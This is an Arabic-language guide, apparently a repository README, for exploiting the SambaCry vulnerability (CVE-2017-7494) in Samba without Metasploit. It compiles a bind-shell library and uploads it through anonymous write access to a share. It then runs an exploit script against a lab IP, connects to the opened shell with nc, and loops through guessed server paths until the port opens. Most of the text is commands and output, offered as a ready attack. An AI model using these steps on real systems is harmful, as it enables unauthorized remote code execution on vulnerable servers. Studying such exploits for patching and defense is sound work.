
SambaCry (CVE-2017-7494) استغلال لـ Samba | bind shell بدون Metasploit
استغلال SambaCry (CVE-2017-7494) لاستغلال Samba (bind shell بدون Metasploit)
إذا احتجت إلى تغيير المنفذ، فقط قم بتغيير السطر 68 من bindshell-samba.c وأعد التجميع:

gcc -c -fpic bindshell-samba.c
gcc -shared -o libbindshell-samba.so bindshell-samba.o
كيفية الاستغلال:
انظر المشاركات (في هذا المثال نستخدم مستخدمًا مجهولًا):
smbclient -L //192.168.10.131/ -U "" -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
publico Disk Publico
IPC$ IPC IPC Service (maq131 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP CHORA
قم بالوصول إلى مجلد وتحقق مما إذا كان المستخدم لديه أذونات الكتابة:
smbclient //192.168.10.131/publico -U "" -N
إذا كان لديك أذونات الكتابة، أرسل الملف libbindshell-samba.so
smb: \> mput libbindshell-samba.so
Put file libbindshell-samba.so? yes
putting file libbindshell-samba.so as \libbindshell-samba.so (3.5 kb/s) (average 3.5 kb/s)
smb: \> dir
. D 0 Tue Nov 1 19:44:15 2022
.. D 0 Wed Jun 14 14:16:35 2017
libbindshell-samba.so A 8432 Tue Nov 1 19:44:17 2022
3997376 blocks of size 1024. 1960284 blocks available
smb: \>
بعد ذلك، قم بتشغيل الاستغلال:
python2 exploit.py -t target_ip -m path_absoluto_server_side
مثال:
python2 exploit.py -t 192.168.10.131 -m /home/publico/libbindshell-samba.so
اتصل بالمنفذ 6699/TCP:
nc -vn 192.168.10.131 6699
إذا كنت لا تعرف المسار المطلق على جانب الخادم، فمن المستحسن إجراء تخمين وانتظار فتح المنفذ 6699/TCP:
for i in $(cat paths.txt);do python2 exploit.py -t 192.168.10.131 -m $i/publico/libbindshell-samba.so 2>/dev/null;done